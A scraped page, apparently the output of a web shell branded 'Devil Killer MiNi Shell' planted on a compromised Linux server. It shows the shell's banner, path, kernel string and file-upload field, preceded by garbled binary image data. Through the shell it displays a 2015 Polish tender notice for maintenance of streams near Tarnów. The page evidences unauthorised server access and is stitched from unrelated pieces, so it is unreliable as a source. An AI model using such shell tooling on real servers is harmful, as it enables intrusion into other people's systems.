JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150720/182374-N-2015.html

<p class="kh_header"><b>Tarnów: Część nr 1 zamówienia: Potoki:  Korytnica w km 0+000-7+900; Strumień w km 0+000-3+600, Ulga Uszewki w km 0+000-3+600 - konserwacja bieżąca.  Część nr 2 zamówienia: Potok Breńka w km 21+600-28+940 - konserwacja  bieżąca.
Część nr 3 zamówienia: Potok Jabłoniec w km 0+000-8+600 - konserwacja bieżąca.</b><br>
<b>Numer ogłoszenia: 182374 - 2015; data zamieszczenia: 20.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część nr 1 zamówienia: Potoki:  Korytnica w km 0+000-7+900; Strumień w km 0+000-3+600, Ulga Uszewki w km 0+000-3+600 - konserwacja bieżąca.  Część nr 2 zamówienia: Potok Breńka w km 21+600-28+940 - konserwacja  bieżąca.
Część nr 3 zamówienia: Potok Jabłoniec w km 0+000-8+600 - konserwacja bieżąca..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1 zamówienia: Potok  Korytnica w km 0+000-7+900: Wykoszenie  porostów gęstych twardych ze skarp i dna z wygrabieniem i wywozem wykoszonej roślinności, łącznie - 47 400,00m2. Ręczne ścinanie krzaków lokalnie ze skarp potoku - 0,6ha. Oczyszczenie terenu po wykarczowaniu z drobnych gałęzi, korzeni, zgrabienie na stosy drobnych gałęzi z wywiezieniem poza obręb robót - 6 000,00m2. Hakowanie przy zarośnięciu powierzchni lustra wody do 60%, wydobycie z dna potoku roślin korzeniących, odłożenie 
na brzeg i rozplantowanie przy górnej krawędzi skarpy potoku - 4 840,00m2. Udrożnienie potoku o szerokości dna  1,50m i 2,00m, grubość warstwy udrożnienia 10cm z przerzuceniem na górną skarpę potoku, łącznie 
- 7 900,00m. Rozplantowanie wzdłuż górnej krawędzi skarpy  potoku urobku po mechanicznym udrożnieniu cieku z naniesionego materiału grubości 20cm 
- 7 900,00m. Likwidacja zatoru w korycie potoku i usunięcie naniesionych gałęzi, śmieci itp. (materiał zamulony) z załadowaniem i wywiezieniem materiału z rozbiórki poza teren obiektu - 2,70m3.
Uwaga: Potok Korytnica w km 0+000-5+550, znajduje się na obszarze Natura 2000 Dębówka nad rzeką Uszewką PLH12120066. Prace konserwacyjne należy prowadzić zgodnie decyzją ST-I.670.27.2015.MB RDOŚ w Krakowie.
Potok Strumień w km 0+000-3+600: Wykoszenie  porostów gęstych twardych ze skarp potoku wraz z wygrabieniem wykoszonych porostów ze skarp potoku ze złożeniem wzdłuż górnej krawędzi skarpy - 21 600,00m2. Ręczne ścinanie krzaków na skarpach - 0,60ha. Oczyszczenie terenu po wykoszeniu porostów ze skarp potoku z załadowaniem na środki transportu i wywiezieniem poza obręb robót - 6 000,00m2.  Hakowanie przy zarośnięciu powierzchni lustra wody do 60% i szerokości 1,0m, wydobycie z dna potoku roślin korzeniących, odłożenie na brzeg i rozplantowanie przy górnej krawędzi skarpy potoku 
- 1 600,00m2. Udrożnienie cieku o szerokości dna 1,00m  grubość warstwy udrożnienia 20cm z przerzuceniem na górną skarpę potoku - 3 600,00m. Wywiezienie wydobytego namułu poza obszar robót - 40,00m3. Rozplantowanie wzdłuż górnej krawędzi skarpy  potoku urobku po udrożnieniu cieku o szerokości  dna 1,0m i grubości warstwy udrożnienia 0,10m 
- 2 600,00m. Oczyszczenie przepustów ramowych 2,0x2,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 25,00m.
Potok Ulga Uszewki w km 0+000-3+600: Wykoszenie  porostów ze skarp i dna wraz z wygrabieniem wykoszonych porostów ze skarp i dna do górnej krawędzi skarpy lub rozdrobnieniem - 21 600,00m2. Ręczne ścinanie krzaków na skarpach odrąbanie drobnych gałęzi, ścięcie rębakiem - 0,33ha. Udrożnienie potoku o szerokości dna do 2,00m, grubość warstwy udrażnianej 20cm z przerzuceniem na górną skarpę potoku, łącznie - 3 600,00m. Uwaga: Potok Ulga Uszewki w km 0+000-1+900, znajduje się na obszarze Natura 2000 Dębówka nad rzeką Uszewką PLH12120066.  Prace konserwacyjne należy prowadzić zgodnie decyzją ST-I.670.24.2015.MB RDOŚ w Krakowie.
Część nr 2 zamówienia: Potok Breńka w km 21+600-28+940: Wykoszenie porostów gęstych twardych ze skarp z wygrabieniem wykoszonych porostów ze skarp ze złożeniem w pryzmy na górnych krawędziach skarp - 44 040,00m2. Wykoszenie porostów gęstych twardych z dna potoku wraz z wygrabianiem wykoszonych porostów z dna potoku ze złożeniem w pryzmy na górnych krawędziach skarp - 6 204,00m2. Udrożnienie potoku warstwą 0,20m o szerokości dna 0,6m i 1,0m wraz z przepustami na trasie potoku 
z rozplantowaniem urobku wzdłuż górnej krawędzi skarp, ewentualnie wbudowanie w miejsca uszkodzeń skarp i brzegów z ubiciem i wyrównaniem, łącznie - 7 340,00m2.   Ścinanie (bez karczowania) zagajników średniej gęstości na 30% powierzchni skarp z rozdrobnieniem rębakiem - 1,32ha. Ścięcie nawisów ziemnych na skarpach potoku (obustronnie) pasem szerokości 1,0m i grubości do 20cm łącznie rozplantowaniem urobku i rozdrobnieniem za pomocą glebogryzarki lub brony talerzowej lub wbudowaniem w ubytki na skarpach - 14 680,00m2. Rozbiórka zatorów z gałęzi, częściowo zamulone. Złożenie materiału z rozbiórki poza krawędzią skarp - 12,00m3. 
Uwaga: Rozbiórki tam bobrowych należy wykonać zgodnie z decyzją ST-I.6401.37.2015.JR  RDOŚ  w Krakowie.
Część nr 3 zamówienia: Potok Jabłoniec w km 0+000-8+600: Wykoszenie porostów gęstych twardych ze skarp i wygrabianie wykoszonych porostów ze skarp ze złożeniem w pryzmy na górnych krawędziach skarp - 51 600,00m2. Wykoszenie porostów  z dna potoku i wygrabianie wykoszonych porostów z dna potoku ze złożeniem w pryzmy na górnych krawędziach skarp - 10 800,00m2. Skarpowanie brzegów potoku (obustronnie)  pasem szerokości średnio 0,8m i grubości do 20cm  łącznie  z rozplantowaniem urobku na skarpach i rozdrobnieniem za pomocą glebogryzarki lub brony talerzowej - 13 760,00m2. Ścinanie gęstych krzaków i podszycia  na 20 % powierzchni skarp z rozdrobnieniem materiału z wycinki rębakiem - 1,03ha. Udrożnienie dna potoku o szer. 0,50m, 0,80m, 1,20m i 2,50m warstwą grubości 20cm wraz z przepustami na trasie potoku z rozplantowaniem urobku wzdłuż górnej krawędzi skarp lub wbudowaniem w miejsce uszkodzeń skarp, łącznie 
- 8 600,00m. Rozbiórka zatorów z gałęzi, częściowo zamulone, złożenie materiału z rozbiórki poza krawędzią skarp, lokalnie na całej długości potoku 
- 10,00m3. Uwaga: Potok Jabłoniec  w km 1+480-4+920 znajdują się na obszarze Chronionego Krajobrazu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Informacja na temat wadium:  
1.1 Wadium wysokości dla :
- części nr 1 zamówienia  - 2700 PLN (słownie: dwa tysiące siedemset złotych)
- części nr 2 zamówienia  - 1300 PLN (słownie: jeden tysiąc trzysta złotych)
- części nr 3 zamówienia  - 1500 PLN (słownie: jeden tysiąc pięćset złotych)
-Wadium należy wnieść przed upływem terminu składania ofert.:
Wadium winno być wniesione w:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( tj. Dz. U. Nr 42, poz. 275 z 2007 r. z późn. zmianami)
Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy zamawiającego: PEKAO S.A. nr konta 48 1240 6292 1111 0010 5126 1194
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Inspektoracie Rejonowym w Tarnowie pokój nr 9.
Dowód wpłaty wadium należy dołączyć do oferty. 
1.2 Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi:
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie 
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i/lub  5 Ustawy.
- okres ważności wadium nie może być krótszy niż okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał co najmniej 1 zamówienie  w okresie ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, (lub wykonuje - w przypadku świadczeń okresowych lub ciągłych), co najmniej  1 usługę dla:
- części nr 1 zamówienia - wartość usługi nie mniejsza niż 80 000 zł (słownie: osiemdziesiąt tysięcy złotych). 
- części nr 2 zamówienia - wartość usługi nie mniejsza niż 45 000 zł (słownie: czterdzieści pięć tysięcy złotych). 
- części nr 3 zamówienia - wartość usługi nie mniejsza niż 55 000 zł (słownie: pięćdziesiąt pięć tysięcy złotych). 
Rodzaj usługi musi odpowiadać przedmiotowi zamówienia, dla wszystkich części tj. konserwacja bieżąca lub usuwanie szkód powodziowych na rzekach i potokach z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie lub są wykonywane należycie.
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować sprzętem i urządzeniami niezbędnymi do wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami. Wykonawca wykaże, że posiada dla :
- części nr 1, 2 i 3 zamówienia co najmniej:  koparkę - 1 szt; 
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,  oraz informacją o podstawie do dysponowania tymi osobami.
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na wartość dla:
- części nr 1 zamówienia - wartość usługi nie mniejsza niż 110 000 zł (słownie: sto dziesięć tysięcy złotych). 
- części nr 2 zamówienia - wartość usługi nie mniejsza niż   60 000 zł (słownie: sześćdziesiąt tysięcy złotych). 
- części nr 3 zamówienia - wartość usługi nie mniejsza niż   65 000 zł (słownie: sześćdziesiąt pięć tysięcy złotych). 
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Rodzaj usługi musi odpowiadać przedmiotowi zamówienia, dla wszystkich części tj. konserwacja bieżąca lub usuwanie szkód powodziowych na rzekach i potokach z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie lub są wykonywane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - wrunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany postanowień umowy w następujących przypadkach: a) zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia. b) zmiany kont bankowych, c) wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy. d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób, aby wynikająca z umowy cena netto pozostała niezmieniona, e) zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu, f) zgodnie z art.144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzania innych, nieistotnych, zmian postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
g) zmiany terminu wykonania umowy z zastrzeżeniem ust.3. Zmiana terminu wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku: a) konieczności udzielenia zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt. 5 ustawy pzp, których wykonanie rzutuje na termin wykonania zamówienia podstawowego, b) zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin wykonania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
